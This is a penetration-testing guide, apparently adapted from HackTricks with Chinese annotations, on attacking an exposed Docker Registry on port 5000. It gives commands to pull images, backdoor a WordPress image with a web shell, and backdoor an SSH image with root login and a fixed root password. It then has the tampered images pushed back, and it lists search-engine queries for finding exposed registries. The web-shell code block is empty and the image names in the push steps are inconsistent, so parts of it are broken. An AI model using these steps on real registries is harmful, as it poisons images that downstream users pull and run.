--- title: "5000 - Docker Registry" weight: 5000 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **5000 - Docker Registry** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > 注意 that when you download and decompress the blobs files and folders will appear in the current directory. **If you download all the blobs and decompress them in the same folder they will overwrite values from the previously decompressed blobs**, so be careful. It may be interesting to decompress each blob inside a different folder to inspect the exact content of each blob. #### 信息收集 using docker ```bash #Once you know which images the server is saving (/v2/_catalog) you can pull them docker pull 10.10.10.10:5000/ubuntu #Check the commands used to create the layers of the image docker history 10.10.10.10:5000/ubuntu #IMAGE CREATED CREATED BY SIZE COMMENT #ed05bef01522 2 years ago ./run.sh 46.8MB # 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B # 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B # 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B # 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB #Run and get a shell docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running docker ps #Using a different shell docker exec -it 7d3a81fe42d7 bash #Get ash shell inside docker container ``` #### Backdooring WordPress image In the scenario where you have found a Docker Registry saving a wordpress image you can backdoor it.\ **Create** the **backdoor**: ```bash:shell.php ``` Create a **Dockerfile**: ```bash:Dockerfile FROM 10.10.10.10:5000/wordpress COPY shell.php /app/ RUN chmod 777 /app/shell.php ``` **Create** the new image, **check** it's created, and **push** it: ```bash docker build -t 10.10.10.10:5000/wordpress . #Create docker images docker push registry:5000/wordpress #Push it ``` #### Backdooring SSH server image Suppose that you found a Docker Registry with a SSH image and you want to backdoor it.\ **Download** the image and **run** it: ```bash docker pull 10.10.10.10:5000/sshd-docker-cli docker run -d 10.10.10.10:5000/sshd-docker-cli ``` Extract the `sshd_config` file from the SSH image: ```bash docker cp 4c989242c714:/etc/ssh/sshd_config . ``` And modify it to set: `PermitRootLogin yes` Create a **Dockerfile** like the following one: ```bash FROM 10.10.10.10:5000/sshd-docker-cli COPY sshd_config /etc/ssh/ RUN echo root:password | chpasswd ``` **Create** the new image, **check** it's created, and **push** it: ```bash docker build -t 10.10.10.10:5000/sshd-docker-cli . #Create docker images docker push registry:5000/sshd-docker-cli #Push it ``` --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="5000" ``` #### Shodan ```bash # Shodan 搜索语法 port:5000 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:5000 ``` --- ## 📖 参考资料 - [HackTricks - 5000-docker-registry](https://book.hacktricks.wiki/en/network-services-pentesting/5000-docker-registry.html)